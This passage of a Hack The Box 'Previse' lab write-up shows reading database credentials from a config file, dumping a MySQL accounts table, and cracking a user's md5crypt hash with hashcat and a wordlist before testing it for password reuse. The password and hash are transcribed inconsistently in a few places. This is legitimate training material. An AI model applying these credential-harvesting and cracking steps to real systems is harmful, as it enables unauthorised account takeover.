Local DB
both network and process enumeration revealed that the target system has the 127.0.0.1:3306 socket is being used for the mysqld process
www-data@previse:/var/www/html$ cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mysql_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>While the DB credential can be found in the config.php file of the web root directory, the file has already been enumerated earlier as it was part of the website backup archive
root:mySQL_p@ssw0rd!:)
previse
www-data@previse:/var/www/html$ mysql -uroot -p
Enter password: mySQL_p@ssw0rd!:)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 82766
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use previse;
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)Connecting to the previse DB
There are 2 tables within the DB
The previse.file table likely contains the website backup archive, the previse.accounts table appears to contains user related data
previse.accounts
mysql> select * from accounts;
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$dqpmdvnb7eeuo6uaqritf. | 2021-05-27 18:18:36 |
| 2 | tester | $1$🧂llol$9tvmjzdae3enqecghpizb0 | 2023-04-12 11:03:17 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)I can see the credential for the m4lwhere user
The password is hashed in a strange manner. The salt string has an emoji in it; $1$🧂llol$
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/previse]
└─$ hashcat -a 0 -m 500 m4lwhere.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Time.Started.....: Wed Apr 12 14:41:27 2023 (4 mins, 40 secs)
Time.Estimated...: Wed Apr 12 14:46:07 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 25861 H/s (6.85ms) @ Accel:128 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7413504/14344385 (51.68%)
Rejected.........: 0/7413504 (0.00%)
Restore.Point....: 7412736/14344385 (51.68%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: ilovecweg -> ilovecj9/21
Hardware.Mon.#1..: Util: 85%
Started: Wed Apr 12 14:41:24 2023
Stopped: Wed Apr 12 14:46:09 2023It took longer than usual due to the wacky salt applied, but hashcat managed to crack the password hash
The cracked password is ilovecody112235!
While this password was used for the m4lwhere user on the web application, the m4lwhere user is also a system user
I will test it out for password reuse